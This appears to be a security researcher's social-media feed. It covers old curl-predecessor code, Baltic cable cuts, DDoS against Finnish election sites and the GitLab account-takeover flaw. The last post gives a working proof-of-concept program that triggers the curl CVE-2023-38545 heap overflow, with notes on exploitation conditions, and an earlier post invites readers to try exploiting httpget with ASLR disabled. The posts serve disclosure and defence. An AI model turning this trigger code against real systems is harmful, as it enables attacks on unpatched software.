Notices by Harry Sintonen (harrysintonen@infosec.exchange)

The httpget 0.2 doesn't quite work in the form it was uploaded.

First it uses hardcoded argv, argc insteda of getting from the app invocation (as args in main, the code uses void main).

Second obtaining any data from the socket will result in the app stopping and leaving behind en empty file (if (nread) break;).

This program could never download anything. It is likely some work in progress or modified test version of httpget.

So while the code has a local stack buffer overflow it can't be triggered for this early version.

#curl predecessor httpget 0.2 from around 1996/1997 is 165 lines. Needless to say, it has multiple critical security vulnerabilities. How many can you spot?

If you build it on a modern system and want to try exploiting it in true 90s fashion, be sure to turn off address space layout randomisation (ASLR).

https://github.com/curl/httpget/blob/master/httpget-0.2.c

#infosec #cybersecurity

#Undersea #telecommunications cable between Finland and Germany has been damaged reports SVT: https://www-svt-se.translate.goog/nyheter/utrikes/uppgifter-om-nytt-kabelbrott-i-ostersjon?_x_tr_sl=sv&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp

#infrastructure

The #GitHub feature we've all been waiting for: Disabling that Copilot nonsense.

#CLion1 telecom cable between Helsinki, Finland and Rostock, Germany has been cut. YLE news: https://yle.fi/a/74-20125339 (english) #infrastructure

Both damaged sea cables have now been repaired and are functioning normally.

• https://www.reuters.com/world/europe/one-two-damaged-baltic-sea-cables-back-online-arelion-says-2024-11-28/
• https://www.cinia.fi/en/news/cinias-c-lion1-submarine-cable-has-fully-restored

#infrastructure #telecoms #telecommunications

#NoName again trying to target Finnish presidential election, in vain. The targets include tulospalvelu.vaalit.fi - a website that is wholly unrelated to actual voting process. The voting in Finnish elections is pen and paper and no amount of #DDoS can affect it.

Finland specifically does NOT employ electronic or online voting systems. The reasons include:
- The existing pen and paper system has been honed to perfection: It's highly effective, secure and well established.
- Moving the system to online systems would allow potential interference from malicious parties.

#NoName target list for today: https://cyberplace.social/@GossiTheDog/111833295726201739 #infosec #elections #presidentinvaalit

The #GitLab #vulnerability allowing trivial account hijacking (CVE-2023-7028) will lead to ton of problems: It will allow malicious actors to perform #supplychain #attacks - something that will allow attacker to gain access to 3rd party who don't themselves run GitLab but just include from projects that do. I would suggest great caution regardless if you run GitLab yourself or not.

Naturally anyone using GitLab themselves must update as soon as possible. I would also suggest performing forensic investigation to find out if you have already been compromised, and take further action in case compromise has already occurred. Check "Were any accounts actually compromised due to this vulnerability?" section in this post for details: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.

#infosec